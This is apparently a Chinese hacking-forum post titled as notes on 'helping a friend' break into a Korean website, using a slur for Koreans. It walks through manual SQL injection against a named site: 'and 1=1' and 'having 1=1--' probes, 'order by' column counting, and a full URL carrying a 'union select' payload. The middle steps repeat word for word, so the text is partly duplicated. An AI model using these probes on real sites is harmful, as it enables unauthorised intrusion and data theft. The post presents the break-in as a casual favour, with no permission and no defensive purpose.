[原创]帮朋友搞一棒子站手记
我一开始用 and 1=1 和and 1=2 测试,发现结果是一样的,本以为没有注入,又用 having 1=1-- 和 having 1=2-- 这才发现有注入,便开始了下一步渗透,
用order by判断出字段数为2
构造如下语句
http://www.l14of.com/hex.php?page=product&id=120 and 1=2 union select 1,2
返回正常,显示出字段位置
用手工简单的爆破了下
...
用order by判断出字段数为2
构造如下语句
http://www.l14of.com/hex.php?page=product&id=120 and 1=2 union select 1,2
返回正常,显示出字段位置
用手工简单的爆破了下
...
